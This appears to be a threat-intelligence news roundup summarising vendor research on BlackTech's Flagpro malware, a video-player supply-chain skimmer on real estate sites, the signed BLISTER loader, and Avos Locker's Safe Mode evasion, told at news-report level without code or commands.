At a glance.
- BlackTech targets Japanese entities with new malware.
- Supply chain attack placed skimmers on real estate websites.
- Malware campaign uses valid signing certificate.
- Avos Locker uses Safe Mode to avoid detection.
BlackTech targets Japanese entities with new malware.
Researchers at NTT Security report that the China-linked threat actor BlackTech is using a new strain of malware dubbed "Flagpro" to target entities in Japan, as well as Taiwan and English-speaking countries. The malware campaign has targeted companies in the defense, media, and communications sectors.
"Flagpro is used in the initial stage of attacks to investigate target’s environment, download a second stage malware and execute it. An attack case using Flagpro starts with a spear phishing e-mail. The message is adjusted to its target organization. It is disguised as an e-mail communication with target’s business partner. This means the attackers probed deeper into their target before attacking.
"The attackers attach a password protected archived file (ZIP or RAR) to the email, and they write its password in the message. The archived file includes an xlsm format file and it contains a malicious macro. If a user activates the macro, a malware will be dropped. They also adjust the contents of the xlsm file to the target."
Supply chain attack placed skimmers on real estate websites.
Palo Alto Networks's Unit 42 has discovered a supply chain attack that compromised more than a hundred real estate websites with a JavaScript skimmer. The attackers exploited an unnamed cloud video player platform to distribute their malicious code:
"When the cloud platform user creates a player, the user is allowed to add their own JavaScript customizations by uploading a JavaScript file to be included in their player. In this specific instance, the user uploaded a script that could be modified upstream to include malicious content.
"We infer that the attacker altered the static script at its hosted location by attaching skimmer code. Upon the next player update, the video platform re-ingested the compromised file and served it along with the impacted player.
"From the code analysis, we know the skimmer snippet is trying to gather victims’ sensitive information such as names, emails, phone numbers, and send them to a collection server, https://cdn-imgcloud[.]com/img, which is also marked as malicious in VirusTotal."
Unit 42 has since helped the cloud video platform and the real estate sites to remove the malware.
Malware campaign uses valid signing certificate.
Elastic Security is tracking a malware campaign that's using a valid code signing certificate to deliver a new malware loader dubbed "BLISTER":
"A key aspect of this campaign is the use of a valid code signing certificate issued by Sectigo. Adversaries can either steal legitimate code-signing certificates or purchase them from a certificate authority directly or through front companies. Executables with valid code signing certificates are often scrutinized to a lesser degree than unsigned executables. Their use allows attackers to remain under the radar and evade detection for a longer period of time. We responsibly disclosed the activity to Sectigo so they could take action and revoke the abused certificates."
Avos Locker uses Safe Mode to avoid detection.
Sophos reports that the relatively new ransomware family Avos Locker is booting infected machines in Safe Mode to avoid detection by security products. This technique isn't new, and has been used in the past by Snatch, REvil, and BlackMatter:
"The Avos Locker attackers were not only rebooting the machines into Safe Mode for the final stages of the attack; They also modified the Safe Mode boot configuration so they could install and use the commercial IT management tool AnyDesk while the Windows computers were still running in Safe Mode. Normally, third party software would be disabled on a computer that had been rebooted into Safe Mode, but these attackers clearly intended to continue to remotely access and control the targeted machines unimpeded."